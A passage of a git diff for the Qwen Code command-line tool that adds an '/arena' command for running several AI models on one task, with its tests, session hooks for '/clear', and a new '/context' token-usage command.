vi.fn(() => ({})), + }; + + mockContext = createMockCommandContext({ + invocation: { + raw: '/arena select', + name: 'arena', + args: 'select', + }, + executionMode: 'interactive', + services: { + config: mockConfig as never, + }, + }); + }); + + it('returns error when no arena session exists', async () => { + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, ''); + + expect(result).toEqual({ + type: 'message', + messageType: 'error', + content: 'No arena session found. Start one with /arena start.', + }); + }); + + it('returns error when arena is still running', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.RUNNING), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, ''); + + expect(result).toEqual({ + type: 'message', + messageType: 'error', + content: + 'Arena session is still running. Wait for it to complete or use /arena stop first.', + }); + }); + + it('returns error when all agents failed', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + getAgentStates: vi.fn(() => [ + { + agentId: 'agent-1', + status: AgentStatus.FAILED, + model: { modelId: 'model-1' }, + }, + ]), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, ''); + + expect(result).toEqual({ + type: 'message', + messageType: 'error', + content: + 'No successful agent results to select from. All agents failed or were cancelled.\n' + + 'Use /arena stop to end the session.', + }); + }); + + it('opens dialog when no args provided and agents have results', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + getAgentStates: vi.fn(() => [ + { + agentId: 'agent-1', + status: AgentStatus.COMPLETED, + model: { modelId: 'model-1' }, + }, + { + agentId: 'agent-2', + status: AgentStatus.COMPLETED, + model: { modelId: 'model-2' }, + }, + ]), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, ''); + + expect(result).toEqual({ + type: 'dialog', + dialog: 'arena_select', + }); + }); + + it('applies changes directly when model name is provided', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + getAgentStates: vi.fn(() => [ + { + agentId: 'agent-1', + status: AgentStatus.COMPLETED, + model: { modelId: 'gpt-4o', displayName: 'gpt-4o' }, + }, + { + agentId: 'agent-2', + status: AgentStatus.COMPLETED, + model: { modelId: 'claude-sonnet', displayName: 'claude-sonnet' }, + }, + ]), + applyAgentResult: vi.fn().mockResolvedValue({ success: true }), + cleanup: vi.fn().mockResolvedValue(undefined), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, 'gpt-4o'); + + expect(mockManager.applyAgentResult).toHaveBeenCalledWith('agent-1'); + expect(mockConfig.cleanupArenaRuntime).toHaveBeenCalled(); + expect(result).toEqual({ + type: 'message', + messageType: 'info', + content: + 'Applied changes from gpt-4o to workspace. Arena session complete.', + }); + }); + + it('returns error when specified model not found', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + getAgentStates: vi.fn(() => [ + { + agentId: 'agent-1', + status: AgentStatus.COMPLETED, + model: { modelId: 'gpt-4o', displayName: 'gpt-4o' }, + }, + ]), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, 'nonexistent'); + + expect(result).toEqual({ + type: 'message', + messageType: 'error', + content: 'No idle agent found matching "nonexistent".', + }); + }); + + it('asks for confirmation when --discard flag is used', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + getAgentStates: vi.fn(() => [ + { + agentId: 'agent-1', + status: AgentStatus.COMPLETED, + model: { modelId: 'gpt-4o' }, + }, + ]), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, '--discard'); + + expect(result).toEqual({ + type: 'confirm_action', + prompt: 'Discard all Arena results and clean up worktrees?', + originalInvocation: { raw: '/arena select' }, + }); + }); + + it('discards results after --discard confirmation', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + getAgentStates: vi.fn(() => [ + { + agentId: 'agent-1', + status: AgentStatus.COMPLETED, + model: { modelId: 'gpt-4o' }, + }, + ]), + cleanup: vi.fn().mockResolvedValue(undefined), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + mockContext.overwriteConfirmed = true; + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, '--discard'); + + expect(mockConfig.cleanupArenaRuntime).toHaveBeenCalled(); + expect(result).toEqual({ + type: 'message', + messageType: 'info', + content: 'Arena results discarded. All worktrees cleaned up.', + }); + }); +}); diff --git a/packages/cli/src/ui/commands/arenaCommand.ts b/packages/cli/src/ui/commands/arenaCommand.ts new file mode 100644 index 000000000..c178a021d --- /dev/null +++ b/packages/cli/src/ui/commands/arenaCommand.ts @@ -0,0 +1,659 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type { + SlashCommand, + CommandContext, + ConfirmActionReturn, + MessageActionReturn, + OpenDialogActionReturn, + SlashCommandActionReturn, +} from './types.js'; +import { CommandKind } from './types.js'; +import { + ArenaManager, + ArenaEventType, + isTerminalStatus, + isSuccessStatus, + ArenaSessionStatus, + AuthType, + createDebugLogger, + stripStartupContext, + type Config, + type ArenaModelConfig, + type ArenaAgentErrorEvent, + type ArenaAgentCompleteEvent, + type ArenaAgentStartEvent, + type ArenaSessionCompleteEvent, + type ArenaSessionErrorEvent, + type ArenaSessionStartEvent, + type ArenaSessionUpdateEvent, +} from '@qwen-code/qwen-code-core'; +import { + MessageType, + type ArenaAgentCardData, + type HistoryItemWithoutId, +} from '../types.js'; + +/** + * Parsed model entry with optional auth type. + */ +interface ParsedModel { + authType?: string; + modelId: string; +} + +/** + * Parses arena command arguments. + * + * Supported formats: + * /arena start --models model1,model2 + * /arena start --models authType1:model1,authType2:model2 + * + * Model format: [authType:]modelId + * - "gpt-4o" → uses default auth type + * - "openai:gpt-4o" → uses "openai" auth type + */ +function parseArenaArgs(args: string): { + models: ParsedModel[]; + task: string; +} { + const modelsMatch = args.match(/--models\s+(\S+)/); + + let models: ParsedModel[] = []; + let task = args; + + if (modelsMatch) { + const modelStrings = modelsMatch[1]!.split(',').filter(Boolean); + models = modelStrings.map((str) => { + // Check for authType:modelId format + const colonIndex = str.indexOf(':'); + if (colonIndex > 0) { + return { + authType: str.substring(0, colonIndex), + modelId: str.substring(colonIndex + 1), + }; + } + return { modelId: str }; + }); + task = task.replace(/--models\s+\S+/, '').trim(); + } + + // Strip surrounding quotes from task + task = task.replace(/^["']|["']$/g, '').trim(); + + return { models, task }; +} + +const debugLogger = createDebugLogger('ARENA_COMMAND'); + +interface ArenaExecutionInput { + task: string; + models: ArenaModelConfig[]; + approvalMode?: string; +} + +function buildArenaExecutionInput( + parsed: ReturnType, + config: Config, +): ArenaExecutionInput | MessageActionReturn { + if (!parsed.task) { + return { + type: 'message', + messageType: 'error', + content: + 'Usage: /arena start --models model1,model2 \n' + + '\n' + + 'Options:\n' + + ' --models [authType:]model1,[authType:]model2\n' + + ' Models to compete (required, at least 2)\n' + + ' Format: authType:modelId or just modelId\n' + + '\n' + + 'Examples:\n' + + ' /arena start --models openai:gpt-4o,anthropic:claude-3 "implement sorting"\n' + + ' /arena start --models qwen-coder-plus,kimi-for-coding "fix the bug"', + }; + } + + if (parsed.models.length < 2) { + return { + type: 'message', + messageType: 'error', + content: + 'Arena requires at least 2 models. Use --models model1,model2 to specify.\n' + + 'Format: [authType:]modelId (e.g., openai:gpt-4o or just gpt-4o)', + }; + } + + // Get the current auth type as default for models without explicit auth type + const contentGeneratorConfig = config.getContentGeneratorConfig(); + const defaultAuthType = + contentGeneratorConfig?.authType ?? AuthType.USE_OPENAI; + + // Build ArenaModelConfig for each model, resolving display names from + // the model registry when available. + const modelsConfig = config.getModelsConfig(); + const models: ArenaModelConfig[] = parsed.models.map((parsedModel) => { + const authType = + (parsedModel.authType as AuthType | undefined) ?? defaultAuthType; + const registryModels = modelsConfig.getAvailableModelsForAuthType(authType); + const resolved = registryModels.find((m) => m.id === parsedModel.modelId); + return { + modelId: parsedModel.modelId, + authType, + displayName: resolved?.label ?? parsedModel.modelId, + }; + }); + + return { + task: parsed.task, + models, + approvalMode: config.getApprovalMode(), + }; +} + +/** + * Persists a single arena history item to the session JSONL file. + * + * Arena events fire asynchronously (after the slash command's recording + * window has closed), so each item must be recorded individually. + */ +function recordArenaItem(config: Config, item: HistoryItemWithoutId): void { + try { + const chatRecorder = config.getChatRecordingService(); + if (!chatRecorder) return; + chatRecorder.recordSlashCommand({ + phase: 'result', + rawCommand: '/arena', + outputHistoryItems: [{ ...item } as Record], + }); + } catch { + debugLogger.error('Failed to record arena history item'); + } +} + +function executeArenaCommand( + config: Config, + ui: CommandContext['ui'], + input: ArenaExecutionInput, +): void { + // Capture the main session's chat history so arena agents start with + // conversational context. Strip the leading startup context (env info + // user message + model ack) because each agent generates its own for + // its worktree directory — keeping the parent's would duplicate it. + let chatHistory; + try { + const fullHistory = config.getGeminiClient().getHistory(); + chatHistory = stripStartupContext(fullHistory); + } catch { + debugLogger.debug('Could not retrieve chat history for arena agents'); + } + + const manager = new ArenaManager(config); + const emitter = manager.getEventEmitter(); + const detachListeners: Array<() => void> = []; + const agentLabels = new Map(); + + const addArenaMessage = ( + type: 'info' | 'warning' | 'error' | 'success', + text: string, + ) => { + ui.addItem({ type, text }, Date.now()); + }; + + const addAndRecordArenaMessage = ( + type: 'info' | 'warning' | 'error' | 'success', + text: string, + ) => { + const item: HistoryItemWithoutId = { type, text }; + ui.addItem(item, Date.now()); + recordArenaItem(config, item); + }; + + const handleSessionStart = (event: ArenaSessionStartEvent) => { + const modelList = event.models + .map((model, index) => ` ${index + 1}. ${model.modelId}`) + .join('\n'); + // SESSION_START fires synchronously before the first await in + // ArenaManager.start(), so the slash command processor's finally + // block already captures this item — no extra recording needed. + addArenaMessage( + MessageType.INFO, + `Arena started with ${event.models.length} agents on task: "${event.task}"\nModels:\n${modelList}`, + ); + }; + + const handleAgentStart = (event: ArenaAgentStartEvent) => { + agentLabels.set(event.agentId, event.model.modelId); + debugLogger.debug( + `Arena agent started: ${event.model.modelId} (${event.agentId})`, + ); + }; + + const handleSessionUpdate = (event: ArenaSessionUpdateEvent) => { + const attachHintPrefix = 'To view agent panes, run: '; + if (event.message.startsWith(attachHintPrefix)) { + const command = event.message.slice(attachHintPrefix.length).trim(); + addAndRecordArenaMessage( + MessageType.INFO, + `Arena panes are running in tmux. Attach with: \`${command}\``, + ); + return; + } + + if (event.type === 'success') { + addAndRecordArenaMessage(MessageType.SUCCESS, event.message); + } else if (event.type === 'info') { + addAndRecordArenaMessage(MessageType.INFO, event.message); + } else { + addAndRecordArenaMessage(MessageType.WARNING, event.message); + } + }; + + const handleAgentError = (event: ArenaAgentErrorEvent) => { + const label = agentLabels.get(event.agentId) || event.agentId; + addAndRecordArenaMessage( + MessageType.ERROR, + `[${label}] failed: ${event.error}`, + ); + }; + + const buildAgentCardData = ( + result: ArenaAgentCompleteEvent['result'], + ): ArenaAgentCardData => ({ + label: result.model.modelId, + status: result.status, + durationMs: result.stats.durationMs, + totalTokens: result.stats.totalTokens, + inputTokens: result.stats.inputTokens, + outputTokens: result.stats.outputTokens, + toolCalls: result.stats.toolCalls, + successfulToolCalls: result.stats.successfulToolCalls, + failedToolCalls: result.stats.failedToolCalls, + rounds: result.stats.rounds, + error: result.error, + diff: result.diff, + }); + + const handleAgentComplete = (event: ArenaAgentCompleteEvent) => { + if (!isTerminalStatus(event.result.status)) { + return; + } + + const agent = buildAgentCardData(event.result); + const item = { + type: 'arena_agent_complete', + agent, + } as HistoryItemWithoutId; + ui.addItem(item, Date.now()); + recordArenaItem(config, item); + }; + + const handleSessionError = (event: ArenaSessionErrorEvent) => { + addAndRecordArenaMessage(MessageType.ERROR, `${event.error}`); + }; + + const handleSessionComplete = (event: ArenaSessionCompleteEvent) => { + const item = { + type: 'arena_session_complete', + sessionStatus: event.result.status, + task: event.result.task, + totalDurationMs: event.result.totalDurationMs ?? 0, + agents: event.result.agents.map(buildAgentCardData), + } as HistoryItemWithoutId; + ui.addItem(item, Date.now()); + recordArenaItem(config, item); + }; + + emitter.on(ArenaEventType.SESSION_START, handleSessionStart); + detachListeners.push(() => + emitter.off(ArenaEventType.SESSION_START, handleSessionStart), + ); + emitter.on(ArenaEventType.AGENT_START, handleAgentStart); + detachListeners.push(() => + emitter.off(ArenaEventType.AGENT_START, handleAgentStart), + ); + emitter.on(ArenaEventType.SESSION_UPDATE, handleSessionUpdate); + detachListeners.push(() => + emitter.off(ArenaEventType.SESSION_UPDATE, handleSessionUpdate), + ); + emitter.on(ArenaEventType.AGENT_ERROR, handleAgentError); + detachListeners.push(() => + emitter.off(ArenaEventType.AGENT_ERROR, handleAgentError), + ); + emitter.on(ArenaEventType.AGENT_COMPLETE, handleAgentComplete); + detachListeners.push(() => + emitter.off(ArenaEventType.AGENT_COMPLETE, handleAgentComplete), + ); + emitter.on(ArenaEventType.SESSION_ERROR, handleSessionError); + detachListeners.push(() => + emitter.off(ArenaEventType.SESSION_ERROR, handleSessionError), + ); + emitter.on(ArenaEventType.SESSION_COMPLETE, handleSessionComplete); + detachListeners.push(() => + emitter.off(ArenaEventType.SESSION_COMPLETE, handleSessionComplete), + ); + + config.setArenaManager(manager); + + const cols = process.stdout.columns || 120; + const rows = Math.max((process.stdout.rows || 40) - 2, 1); + + const lifecycle = manager + .start({ + task: input.task, + models: input.models, + cols, + rows, + approvalMode: input.approvalMode, + chatHistory, + }) + .then( + () => { + debugLogger.debug('Arena agents settled'); + }, + (error) => { + const message = error instanceof Error ? error.message : String(error); + addAndRecordArenaMessage(MessageType.ERROR, `${message}`); + debugLogger.error('Arena session failed:', error); + + // Clear the stored manager so subsequent /arena start calls + // are not blocked by the stale reference after a startup failure. + config.setArenaManager(null); + + // Detach listeners on failure — session is done for good. + for (const detach of detachListeners) { + detach(); + } + }, + ); + + // NOTE: listeners are NOT detached when start() resolves because agents + // may still be alive (IDLE) and accept follow-up tasks. The listeners + // reference this manager's emitter, so they are garbage collected when + // the manager is cleaned up and replaced. + + // Store so that stop can wait for start() to fully unwind before cleanup + manager.setLifecyclePromise(lifecycle); +} + +export const arenaCommand: SlashCommand = { + name: 'arena', + description: 'Manage Arena sessions', + kind: CommandKind.BUILT_IN, + subCommands: [ + { + name: 'start', + description: + 'Start an Arena session with multiple models competing on the same task', + kind: CommandKind.BUILT_IN, + action: async ( + context: CommandContext, + args: string, + ): Promise => { + const executionMode = context.executionMode ?? 'interactive'; + if (executionMode !== 'interactive') { + return { + type: 'message', + messageType: 'error', + content: + 'Arena is not supported in non-interactive mode. Use interactive mode to start an Arena session.', + }; + } + + const { services, ui } = context; + const { config } = services; + + if (!config) { + return { + type: 'message', + messageType: 'error', + content: 'Configuration not available.', + }; + } + + // Refuse to start if a session already exists (regardless of status) + const existingManager = config.getArenaManager(); + if (existingManager) { + return { + type: 'message', + messageType: 'error', + content: + 'An Arena session exists. Use /arena stop or /arena select to end it before starting a new one.', + }; + } + + const parsed = parseArenaArgs(args); + if (parsed.models.length === 0) { + return { + type: 'dialog', + dialog: 'arena_start', + }; + } + + const executionInput = buildArenaExecutionInput(parsed, config); + if ('type' in executionInput) { + return executionInput; + } + + executeArenaCommand(config, ui, executionInput); + }, + }, + { + name: 'stop', + description: 'Stop the current Arena session', + kind: CommandKind.BUILT_IN, + action: async ( + context: CommandContext, + ): Promise => { + const executionMode = context.executionMode ?? 'interactive'; + if (executionMode !== 'interactive') { + return { + type: 'message', + messageType: 'error', + content: + 'Arena is not supported in non-interactive mode. Use interactive mode to stop an Arena session.', + }; + } + + const { config } = context.services; + if (!config) { + return { + type: 'message', + messageType: 'error', + content: 'Configuration not available.', + }; + } + + const manager = config.getArenaManager(); + if (!manager) { + return { + type: 'message', + messageType: 'error', + content: 'No running Arena session found.', + }; + } + + return { + type: 'dialog', + dialog: 'arena_stop', + }; + }, + }, + { + name: 'status', + description: 'Show the current Arena session status', + kind: CommandKind.BUILT_IN, + action: async ( + context: CommandContext, + ): Promise => { + const executionMode = context.executionMode ?? 'interactive'; + if (executionMode !== 'interactive') { + return { + type: 'message', + messageType: 'error', + content: 'Arena is not supported in non-interactive mode.', + }; + } + + const { config } = context.services; + if (!config) { + return { + type: 'message', + messageType: 'error', + content: 'Configuration not available.', + }; + } + + const manager = config.getArenaManager(); + if (!manager) { + return { + type: 'message', + messageType: 'error', + content: 'No Arena session found. Start one with /arena start.', + }; + } + + return { + type: 'dialog', + dialog: 'arena_status', + }; + }, + }, + { + name: 'select', + altNames: ['choose'], + description: + 'Select a model result and merge its diff into the current workspace', + kind: CommandKind.BUILT_IN, + action: async ( + context: CommandContext, + args: string, + ): Promise< + | void + | MessageActionReturn + | OpenDialogActionReturn + | ConfirmActionReturn + > => { + const executionMode = context.executionMode ?? 'interactive'; + if (executionMode !== 'interactive') { + return { + type: 'message', + messageType: 'error', + content: 'Arena is not supported in non-interactive mode.', + }; + } + + const { config } = context.services; + if (!config) { + return { + type: 'message', + messageType: 'error', + content: 'Configuration not available.', + }; + } + + const manager = config.getArenaManager(); + + if (!manager) { + return { + type: 'message', + messageType: 'error', + content: 'No arena session found. Start one with /arena start.', + }; + } + + const sessionStatus = manager.getSessionStatus(); + if ( + sessionStatus === ArenaSessionStatus.RUNNING || + sessionStatus === ArenaSessionStatus.INITIALIZING + ) { + return { + type: 'message', + messageType: 'error', + content: + 'Arena session is still running. Wait for it to complete or use /arena stop first.', + }; + } + + // Handle --discard flag before checking for successful agents, + // so users can clean up worktrees even when all agents failed. + const trimmedArgs = args.trim(); + if (trimmedArgs === '--discard') { + if (!context.overwriteConfirmed) { + return { + type: 'confirm_action', + prompt: 'Discard all Arena results and clean up worktrees?', + originalInvocation: { + raw: context.invocation?.raw || '/arena select --discard', + }, + }; + } + + await config.cleanupArenaRuntime(true); + return { + type: 'message', + messageType: 'info', + content: 'Arena results discarded. All worktrees cleaned up.', + }; + } + + const agents = manager.getAgentStates(); + const hasSuccessful = agents.some((a) => isSuccessStatus(a.status)); + + if (!hasSuccessful) { + return { + type: 'message', + messageType: 'error', + content: + 'No successful agent results to select from. All agents failed or were cancelled.\n' + + 'Use /arena stop to end the session.', + }; + } + + // Handle direct model selection via args + if (trimmedArgs) { + const matchingAgent = agents.find( + (a) => + isSuccessStatus(a.status) && + a.model.modelId.toLowerCase() === trimmedArgs.toLowerCase(), + ); + + if (!matchingAgent) { + return { + type: 'message', + messageType: 'error', + content: `No idle agent found matching "${trimmedArgs}".`, + }; + } + + const label = matchingAgent.model.modelId; + const result = await manager.applyAgentResult(matchingAgent.agentId); + if (!result.success) { + return { + type: 'message', + messageType: 'error', + content: `Failed to apply changes from ${label}: ${result.error}`, + }; + } + + await config.cleanupArenaRuntime(true); + return { + type: 'message', + messageType: 'info', + content: `Applied changes from ${label} to workspace. Arena session complete.`, + }; + } + + // No args → open the select dialog + return { + type: 'dialog', + dialog: 'arena_select', + }; + }, + }, + ], +}; diff --git a/packages/cli/src/ui/commands/clearCommand.test.ts b/packages/cli/src/ui/commands/clearCommand.test.ts index e94c974fb..5887a8012 100644 --- a/packages/cli/src/ui/commands/clearCommand.test.ts +++ b/packages/cli/src/ui/commands/clearCommand.test.ts @@ -8,6 +8,10 @@ import { vi, describe, it, expect, beforeEach } from 'vitest'; import { clearCommand } from './clearCommand.js'; import { type CommandContext } from './types.js'; import { createMockCommandContext } from '../../test-utils/mockCommandContext.js'; +import { + SessionEndReason, + SessionStartSource, +} from '@qwen-code/qwen-code-core'; // Mock the telemetry service vi.mock('@qwen-code/qwen-code-core', async () => { @@ -26,10 +30,19 @@ describe('clearCommand', () => { let mockContext: CommandContext; let mockResetChat: ReturnType; let mockStartNewSession: ReturnType; + let mockFireSessionEndEvent: ReturnType; + let mockFireSessionStartEvent: ReturnType; + let mockGetHookSystem: ReturnType; beforeEach(() => { mockResetChat = vi.fn().mockResolvedValue(undefined); mockStartNewSession = vi.fn().mockReturnValue('new-session-id'); + mockFireSessionEndEvent = vi.fn().mockResolvedValue(undefined); + mockFireSessionStartEvent = vi.fn().mockResolvedValue(undefined); + mockGetHookSystem = vi.fn().mockReturnValue({ + fireSessionEndEvent: mockFireSessionEndEvent, + fireSessionStartEvent: mockFireSessionStartEvent, + }); vi.clearAllMocks(); mockContext = createMockCommandContext({ @@ -40,6 +53,12 @@ describe('clearCommand', () => { resetChat: mockResetChat, }) as unknown as GeminiClient, startNewSession: mockStartNewSession, + getHookSystem: mockGetHookSystem, + getDebugLogger: () => ({ + warn: vi.fn(), + }), + getModel: () => 'test-model', + getToolRegistry: () => undefined, }, }, session: { @@ -75,6 +94,50 @@ describe('clearCommand', () => { expect(mockContext.ui.clear).toHaveBeenCalled(); }); + it('should fire SessionEnd event before clearing and SessionStart event after clearing', async () => { + if (!clearCommand.action) { + throw new Error('clearCommand must have an action.'); + } + + await clearCommand.action(mockContext, ''); + + expect(mockGetHookSystem).toHaveBeenCalled(); + expect(mockFireSessionEndEvent).toHaveBeenCalledWith( + SessionEndReason.Clear, + ); + expect(mockFireSessionStartEvent).toHaveBeenCalledWith( + SessionStartSource.Clear, + 'test-model', + ); + + // SessionEnd should be called before SessionStart + const sessionEndCallOrder = + mockFireSessionEndEvent.mock.invocationCallOrder[0]; + const sessionStartCallOrder = + mockFireSessionStartEvent.mock.invocationCallOrder[0]; + expect(sessionEndCallOrder).toBeLessThan(sessionStartCallOrder); + }); + + it('should handle hook errors gracefully and continue execution', async () => { + if (!clearCommand.action) { + throw new Error('clearCommand must have an action.'); + } + + mockFireSessionEndEvent.mockRejectedValue( + new Error('SessionEnd hook failed'), + ); + mockFireSessionStartEvent.mockRejectedValue( + new Error('SessionStart hook failed'), + ); + + await clearCommand.action(mockContext, ''); + + // Should still complete the clear operation despite hook errors + expect(mockStartNewSession).toHaveBeenCalledTimes(1); + expect(mockResetChat).toHaveBeenCalledTimes(1); + expect(mockContext.ui.clear).toHaveBeenCalledTimes(1); + }); + it('should not attempt to reset chat if config service is not available', async () => { if (!clearCommand.action) { throw new Error('clearCommand must have an action.'); diff --git a/packages/cli/src/ui/commands/clearCommand.ts b/packages/cli/src/ui/commands/clearCommand.ts index dd774934b..7de8192e2 100644 --- a/packages/cli/src/ui/commands/clearCommand.ts +++ b/packages/cli/src/ui/commands/clearCommand.ts @@ -7,7 +7,13 @@ import type { SlashCommand } from './types.js'; import { CommandKind } from './types.js'; import { t } from '../../i18n/index.js'; -import { uiTelemetryService } from '@qwen-code/qwen-code-core'; +import { + uiTelemetryService, + SessionEndReason, + SessionStartSource, + ToolNames, + SkillTool, +} from '@qwen-code/qwen-code-core'; export const clearCommand: SlashCommand = { name: 'clear', @@ -20,11 +26,29 @@ export const clearCommand: SlashCommand = { const { config } = context.services; if (config) { + // Fire SessionEnd event before clearing (current session ends) + try { + await config + .getHookSystem() + ?.fireSessionEndEvent(SessionEndReason.Clear); + } catch (err) { + config.getDebugLogger().warn(`SessionEnd hook failed: ${err}`); + } + const newSessionId = config.startNewSession(); // Reset UI telemetry metrics for the new session uiTelemetryService.reset(); + // Clear loaded-skills tracking so /context doesn't show stale data + const skillTool = config + .getToolRegistry() + ?.getAllTools() + .find((tool) => tool.name === ToolNames.SKILL); + if (skillTool instanceof SkillTool) { + skillTool.clearLoadedSkills(); + } + if (newSessionId && context.session.startNewSession) { context.session.startNewSession(newSessionId); } @@ -40,6 +64,18 @@ export const clearCommand: SlashCommand = { } else { context.ui.setDebugMessage(t('Starting a new session and clearing.')); } + + // Fire SessionStart event after clearing (new session starts) + try { + await config + .getHookSystem() + ?.fireSessionStartEvent( + SessionStartSource.Clear, + config.getModel() ?? '', + ); + } catch (err) { + config.getDebugLogger().warn(`SessionStart hook failed: ${err}`); + } } else { context.ui.setDebugMessage(t('Starting a new session and clearing.')); } diff --git a/packages/cli/src/ui/commands/contextCommand.ts b/packages/cli/src/ui/commands/contextCommand.ts new file mode 100644 index 000000000..c693606a9 --- /dev/null +++ b/packages/cli/src/ui/commands/contextCommand.ts @@ -0,0 +1,376 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +import { + type CommandContext, + type SlashCommand, + CommandKind, +} from './types.js'; +import { + MessageType, + type HistoryItemContextUsage, + type ContextCategoryBreakdown, + type ContextToolDetail, + type ContextMemoryDetail, + type ContextSkillDetail, +} from '../types.js'; +import { + DiscoveredMCPTool, + uiTelemetryService, + getCoreSystemPrompt, + DEFAULT_TOKEN_LIMIT, + ToolNames, + SkillTool, + buildSkillLlmContent, +} from '@qwen-code/qwen-code-core'; +import { t } from '../../i18n/index.js'; + +/** + * Default compression token threshold (triggers compression at 70% usage). + * The autocompact buffer is (1 - threshold) * contextWindowSize. + */ +const DEFAULT_COMPRESSION_THRESHOLD = 0.7; + +/** + * Estimate token count for a string using a character-based heuristic. + * ASCII chars ≈ 4 chars/token, CJK/non-ASCII chars ≈ 1.5 tokens/char. + */ +function estimateTokens(text: string): number { + if (!text || text.length === 0) return 0; + let asciiChars = 0; + let nonAsciiChars = 0; + for (let i = 0; i < text.length; i++) { + const charCode = text.charCodeAt(i); + if (charCode < 128) { + asciiChars++; + } else { + nonAsciiChars++; + } + } + // CJK and other non-ASCII characters typically produce 1.5-2 tokens each + return Math.ceil(asciiChars / 4 + nonAsciiChars * 1.5); +} + +/** + * Parse concatenated memory content into individual file entries. + * Memory content format: "--- Context from: ---\n\n--- End of Context from: ---" + */ +function parseMemoryFiles(memoryContent: string): ContextMemoryDetail[] { + if (!memoryContent || memoryContent.trim().length === 0) return []; + + const results: ContextMemoryDetail[] = []; + // Use backreference (\1) to ensure start/end path markers match + const regex = + /--- Context from: (.+?) ---\n([\s\S]*?)--- End of Context from: \1 ---/g; + let match: RegExpExecArray | null; + + while ((match = regex.exec(memoryContent)) !== null) { + const filePath = match[1]!; + const content = match[2]!; + results.push({ + path: filePath, + tokens: estimateTokens(content), + }); + } + + // If no structured markers found, treat as a single memory block + if (results.length === 0 && memoryContent.trim().length > 0) { + results.push({ + path: t('memory'), + tokens: estimateTokens(memoryContent), + }); + } + + return results; +} + +export const contextCommand: SlashCommand = { + name: 'context', + get description() { + return t( + 'Show context window usage breakdown. Use "/context detail" for per-item breakdown.', + ); + }, + kind: CommandKind.BUILT_IN, + action: async (context: CommandContext, args?: string) => { + const showDetails = + args?.trim().toLowerCase() === 'detail' || + args?.trim().toLowerCase() === '-d'; + const { config } = context.services; + if (!config) { + context.ui.addItem( + { + type: MessageType.ERROR, + text: t('Config not loaded.'), + }, + Date.now(), + ); + return; + } + + // --- Gather data --- + + const modelName = config.getModel() || 'unknown'; + const contentGeneratorConfig = config.getContentGeneratorConfig(); + const contextWindowSize = + contentGeneratorConfig.contextWindowSize ?? DEFAULT_TOKEN_LIMIT; + + // Total prompt token count from API (most accurate) + const apiTotalTokens = uiTelemetryService.getLastPromptTokenCount(); + // Cached content token count — when available (e.g. DashScope prefix caching), + // represents the cached overhead (system prompt + tools). Using this gives a much + // more accurate "Messages" count: promptTokens - cachedTokens = actual history tokens. + const apiCachedTokens = uiTelemetryService.getLastCachedContentTokenCount(); + + // 1. System prompt tokens (without memory, as memory is counted separately) + const systemPromptText = getCoreSystemPrompt(undefined, modelName); + const systemPromptTokens = estimateTokens(systemPromptText); + + // 2. Tool declarations tokens (includes ALL tools: built-in, MCP, skill tool) + const toolRegistry = config.getToolRegistry(); + const allTools = toolRegistry ? toolRegistry.getAllTools() : []; + const toolDeclarations = toolRegistry + ? toolRegistry.getFunctionDeclarations() + : []; + const toolsJsonStr = JSON.stringify(toolDeclarations); + const allToolsTokens = estimateTokens(toolsJsonStr); + + // 3. Per-tool details (for breakdown display) + const builtinTools: ContextToolDetail[] = []; + const mcpTools: ContextToolDetail[] = []; + for (const tool of allTools) { + const toolJsonStr = JSON.stringify(tool.schema); + const tokens = estimateTokens(toolJsonStr); + if (tool instanceof DiscoveredMCPTool) { + mcpTools.push({ + name: `${tool.serverName}__${tool.serverToolName || tool.name}`, + tokens, + }); + } else if (tool.name !== ToolNames.SKILL) { + // Built-in tool (exclude SkillTool, which is shown under Skills) + builtinTools.push({ + name: tool.name, + tokens, + }); + } + } + + // 4. Memory files + const memoryContent = config.getUserMemory(); + const memoryFiles = parseMemoryFiles(memoryContent); + const memoryFilesTokens = memoryFiles.reduce((sum, f) => sum + f.tokens, 0); + + // 5. Skills (progressive disclosure) + // Two cost components: + // a) Tool definition: SkillTool's description embeds all skill + // name+description listings plus instruction text — always in context. + // b) Loaded bodies: When the model invokes a skill, the full SKILL.md + // body is injected into the conversation as a tool result. We track + // which skills have been loaded and attribute their body tokens here + // so the "Skills" category accurately reflects the total cost. + const skillTool = allTools.find((tool) => tool.name === ToolNames.SKILL); + const skillToolDefinitionTokens = skillTool + ? estimateTokens(JSON.stringify(skillTool.schema)) + : 0; + + // Determine which skills have been loaded in this session + const loadedSkillNames: ReadonlySet = + skillTool instanceof SkillTool + ? skillTool.getLoadedSkillNames() + : new Set(); + + // Per-skill breakdown: listing cost + body cost for loaded skills + const skillManager = config.getSkillManager(); + const skillConfigs = skillManager ? await skillManager.listSkills() : []; + let loadedBodiesTokens = 0; + const skills: ContextSkillDetail[] = 